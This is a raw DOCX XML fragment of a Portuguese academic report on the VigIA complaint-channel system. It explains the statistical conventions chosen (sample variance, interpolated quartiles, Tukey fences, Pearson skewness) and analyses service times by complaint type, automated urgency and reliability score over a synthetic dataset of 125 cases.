        <w:gridCol w:w="29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Estrutura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Problema que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as outras não serviriam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 ordenada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@OrderColumn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 do tempo do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conjunto não tem ordem; uma pilha só daria acesso ao topo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Fila de prioridade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PriorityQueue</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(heap binário)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Ordem de atendimento por gravidade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fila simples atenderia por chegada, o que é injusto e perigoso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Pilha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ArrayDeque</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(LIFO)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Desfazer a última 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lista permitiria desfazer do meio, criando estado inexistente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End w:id="94"/>
    <w:bookmarkStart w:id="105" w:name="X2b261966d4cd2d6f5331ec74e9e886792b3b5d0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Requisito (b): relatórios estatísticos com gráficos</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="95" w:name="a-base-analisada-e-o-método"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.1 A base analisada e o método</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">De onde vêm os números.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A base tem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">125 denúncias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 120 geradas deterministicamente a partir da semente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">561601</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(o RM do autor) e 5 de demonstração, cobrindo de 02/03/2026 a 04/07/2026. Dessas,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">76 já foram concluídas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e alimentam a análise de tempo;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">49 continuam em aberto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Não existem duas massas de dados. O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">data.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do backend e o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">database/02_dml_carga.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">carregam exatamente as mesmas 125 linhas e os mesmos 201 eventos de histórico, uma em sintaxe H2 e outra em sintaxe Oracle. Quem avaliar pode rodar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">03_consultas.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e encontrar na tela do painel o mesmo número que este documento afirma. Ser determinística significa que reexecutar o gerador produz o mesmo conjunto: nenhum número aqui depende de sorte de execução.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Onde a estatística é calculada.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Toda no servidor, na classe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EstatisticaService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que não conhece denúncia, banco nem HTTP: recebe uma lista de números e devolve as medidas. O isolamento é deliberado, porque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">estatística errada é o tipo de defeito que não quebra o sistema, ele só faz o sistema mentir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Manter o cálculo separado permite testá-lo contra valores conferidos à mão, sem subir contexto de Spring nem popular banco. São 25 testes dedicados a essa frente, 14 no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EstatisticaServiceTest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e 11 no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RelatorioServiceTest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com os valores esperados calculados manualmente e documentados no cabeçalho de cada método.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O front-end não recalcula nada. Média e desvio chegam prontos da API pelo mesmo motivo que o score saiu do navegador nesta fase: dois lugares calculando a mesma coisa são uma divergência esperando para acontecer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Convenções adotadas, e por quê.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cada escolha abaixo segue uma referência, e não uma preferência.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3300"/>
        <w:gridCol w:w="33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e fonte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Variância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Amostral</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, divisor n menos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125 denúncias são uma amostra do que o canal receberia em operação real, não a população de todas as denúncias possíveis. O divisor n menos 1 é o que torna o estimador não viesado da variância populacional (PENN STATE, [s.d.]a)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Quartis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Interpolação linear</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, igual ao</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PERCENTILE_CONT</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">do 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Existem várias convenções de quartil e elas divergem na segunda casa. A função do banco assume distribuição contínua e devolve valor interpolado entre os valores ordenados (ORACLE, [s.d.]). Adotar a mesma convenção garante que o SQL e o painel devolvam o mesmo número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Regra das cercas</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, 1,5 vezes o IQR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manual do NIST define a cerca inferior como Q1 menos 1,5 vezes o IQR e a superior como Q3 mais 1,5 vezes o IQR, e classifica como</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">outlier</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">moderado o ponto além dessas cercas (NIST/SEMATECH, 2012a). O critério é preferível ao de desvios padrão porque não pressupõe normalidade, e o tempo de atendimento deste canal é assimétrico, como a própria análise mostra. A regra remonta à análise exploratória de dados de Tukey (1977)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Assimetria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2.º coeficiente de Pearson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Definido pelo NIST como três vezes a diferença entre média e mediana, dividida pelo desvio padrão (NIST/SEMATECH, 2012b). É interpretável: diz o quanto a média foi puxada para longe da mediana, que é exatamente a pergunta de negócio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Dispersão relativa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Coeficiente de variação</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, razão entre desvio padrão e média (NIST, [s.d.])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Permite comparar a dispersão entre categorias com médias diferentes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Dias fracionários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Arredondar para cima transformaria um caso resolvido em sete horas num caso de</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">um dia</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, e a mediana da urgência CRÍTICA perderia justamente a resolução que a torna interessante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Hoje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Último evento da base</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(04/07/2026 03:46)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Uma base congelada no tempo faria a espera média crescer um dia a cada dia. O painel deixaria de bater com o relatório impresso já na semana seguinte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Recortes pequenos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Omitidos com n menor que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Variância amostral com uma única observação é indefinida. Exibir zero ali sugeriria consistência perfeita onde não há informação</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="95"/>
    <w:bookmarkStart w:id="96" w:name="Xef5d217b6a3718f3207386aa9b467f02aaf2eb6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.2 Medidas de tendência central e de dispersão</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Amostra: as 76 denúncias concluídas.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44"/>
        <w:gridCol w:w="1782"/>
        <w:gridCol w:w="38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5,47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caso</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">médio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4,59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metade dos casos fecha antes disso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desfecho mais frequente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Mínimo e máximo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0,30 e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">22,95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sete horas a três semanas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Variância amostral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ao quadrado, sem significado direto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Desvio padrão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4,04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dispersão em torno da média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Coeficiente de variação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73,92 %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dispersão relativa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Q1, Q3 e IQR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2,37 · 7,91 · 5,54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metade central dos casos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Cerca superior de Tukey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16,23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acima disso, é outlier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Outliers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  <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(22,95 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único caso extremo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Assimetria de Pearson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+0,65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cauda à direita</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A média não descreve este canal.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A distância entre média (5,47) e mediana (4,59) já sinaliza isso, e a assimetria de +0,65 confirma: um grupo de casos lentos puxa a média para cima, e o caso típico é mais rápido do que a média sugere. O ponto não é novidade em engenharia de sistemas: o capítulo sobre objetivos de nível de serviço do livro de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Site Reliability Engineering</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do Google adverte que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">averaging request latencies may seem attractive, but obscures an important detail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e recomenda tratar métricas como distribuições, e não como médias (GOOGLE, 2016).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O coeficiente de variação de 73,92 % é o número mais desconfortável da tabela.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A dispersão equivale a quase três quartos da média. Na prática: dois cidadãos que registram a mesma denúncia no mesmo dia podem ter experiências completamente diferentes, um atendido em dois dias e outro em quinze. Do ponto de vista de política pública,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">inconsistência de atendimento é um problema tão sério quanto lentidão</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, porque destrói a previsibilidade que faz alguém confiar no canal a ponto de usá-lo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vale registrar o contraste com o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">score de confiabilidade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que se comporta de maneira oposta: média 63,08, mediana 63,00, assimetria +0,01, coeficiente de variação de 27,70 % e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nenhum outlier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. É uma distribuição praticamente simétrica. A diferença faz sentido, porque o score é calculado por regra determinística sobre o conteúdo da denúncia, enquanto o tempo de atendimento depende de disponibilidade de equipe, complexidade do caso e prioridade. Um é produto de fórmula; o outro, de operação.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="96"/>
    <w:bookmarkStart w:id="97" w:name="X3b0c782a64f8d528b54f91a5ed9ae434359b065"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.3 Gráfico 1: distribuição do tempo até a conclusão</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Histograma dos 76 casos concluídos, em faixas de 2 dias. É o primeiro gráfico do painel, em barras verticais.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320"/>
        <w:gridCol w:w="3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Faixa (dias)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▇▇▇▇▇▇▇▇▇▇▇▇▌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a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▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇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a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▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇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a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▇▇▇▇▇▇▇▇▇▇▇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 a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▇▇▇▇▇▇▇▇▇▇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 a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a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 ou mais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▇▇▇</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A forma é a de uma distribuição assimétrica à direita: pico entre 2 e 4 dias, queda acentuada depois e uma cauda fina que se estende até 22,95 dias.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sessenta e oito dos 76 casos (89,5 %) fecham em até 10 dias; os 8 restantes se espalham por outros treze dias de calendário.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Percentis: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9,93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12,63</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O percentil 90 é o número que interessa a quem promete prazo, e a seção 4.3.1 volta a ele.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="97"/>
    <w:bookmarkStart w:id="98" w:name="gráfico-2-tempo-por-tipo-de-denúncia"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.4 Gráfico 2: tempo por tipo de denúncia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Barras horizontais, ordenadas por média crescente.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24"/>
        <w:gridCol w:w="638"/>
        <w:gridCol w:w="1149"/>
        <w:gridCol w:w="1596"/>
        <w:gridCol w:w="1405"/>
        <w:gridCol w:w="14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Violência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2,57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Discriminação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11,16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22,95</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A ordem é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">monotônica e coincide exatamente com a gravidade percebida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Violência fecha em 2,57 dias;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">outros</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, em 11,16, o que é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4,3 vezes mais tempo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Não é acaso de arredondamento: a diferença aparece também nas medianas e nos máximos. O caso de violência mais lento da base (5,41 dias) ainda é mais rápido que a mediana de assédio (7,94).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Duas observações menos óbvias.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O desvio padrão cresce junto com a média.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Violência tem desvio de 1,56;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">outros</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, de 5,53. Casos graves não são apenas atendidos mais rápido, são atendidos de forma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mais previsível</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Faz sentido operacional: violência tem protocolo definido e rede de encaminhamento pronta, enquanto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">outros</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exige decidir caso a caso para onde mandar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Outros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concentra os problemas.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">É o tipo mais lento, o de maior dispersão e o dono do único outlier da base (22,95 dias). São 16 denúncias, 12,8 % do volume. Uma categoria residual que absorve tudo o que não se encaixa nas outras quatro vira, na prática, uma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">fila sem dono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="98"/>
    <w:bookmarkStart w:id="99" w:name="X4a8b52909f3f6d686c964482876ad3e67a6469d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.5 Gráfico 3: tempo por urgência atribuída pela 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12"/>
        <w:gridCol w:w="638"/>
        <w:gridCol w:w="1021"/>
        <w:gridCol w:w="1469"/>
        <w:gridCol w:w="1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Urgência do VigIA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5,14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Também monotônico. Casos classificados como CRÍTICA fecham quase</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">três vezes mais rápido</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que os de urgência BAIXA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este resultado tem peso especial: a urgência não é digitada por ninguém, é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">atribuída automaticamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pelo VigIA a partir do texto do relato. Que o tempo real de atendimento acompanhe essa classificação significa que a leitura automática está capturando algo que a equipe também reconhece como prioritário.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A validação empírica de uma decisão automatizada não é um luxo analítico neste contexto, é um dever legal: a LGPD garante ao titular o direito de solicitar revisão de decisões tomadas unicamente com base em tratamento automatizado e obriga o controlador a informar os critérios utilizados (BRASIL, 2018a, art. 20). Uma classificação que ninguém consegue conferir é uma classificação que não deveria orientar atendimento público.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Um cuidado interpretativo, porém:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">a urgência do VigIA e o tipo da denúncia não são independentes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Violência tende a receber urgência alta. Parte do efeito da seção 4.2.4 e parte do efeito desta seção são o mesmo efeito visto por dois ângulos. Separar as duas contribuições exigiria uma amostra maior e um modelo multivariado, que está fora do escopo desta fase.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="99"/>
    <w:bookmarkStart w:id="100" w:name="X4a82a2196794ef21d437d4398ff98c2e8ad847f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.6 Gráfico 4: score contra tempo, um gráfico de dispersão</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Correlação linear de Pearson entre score e tempo até a conclusão, sobre os 76 casos concluídos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">r = −0,091</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, r² = 0,0083, correlação praticamente nula.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O score explica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">menos de 1 %</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da variação do tempo de atendimento. Uma denúncia bem documentada não é atendida mais rápido por ser bem documentada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vale registrar uma decisão de privacidade sobre este gráfico específico. Um gráfico de dispersão plota</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">um ponto por caso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, o que é diferente de tudo o mais no relatório, que é agregado. Por isso o ponto carrega apenas duas coordenadas numéricas, score e dias, sem identificador, sem protocolo e sem qualquer campo que permita voltar ao caso. A dispersão mostra a forma da nuvem, e não a lista de quem está nela.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Isso não é necessariamente um defeito da operação. Há uma leitura em que é o comportamento correto:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">gravidade deve pesar mais que verificabilidade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Uma denúncia de violência mal redigida não deve esperar atrás de uma reclamação administrativa impecavelmente documentada, e é exatamente essa a ordem que a fila de prioridade impõe, com a urgência como primeiro critério e o score apenas como desempate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
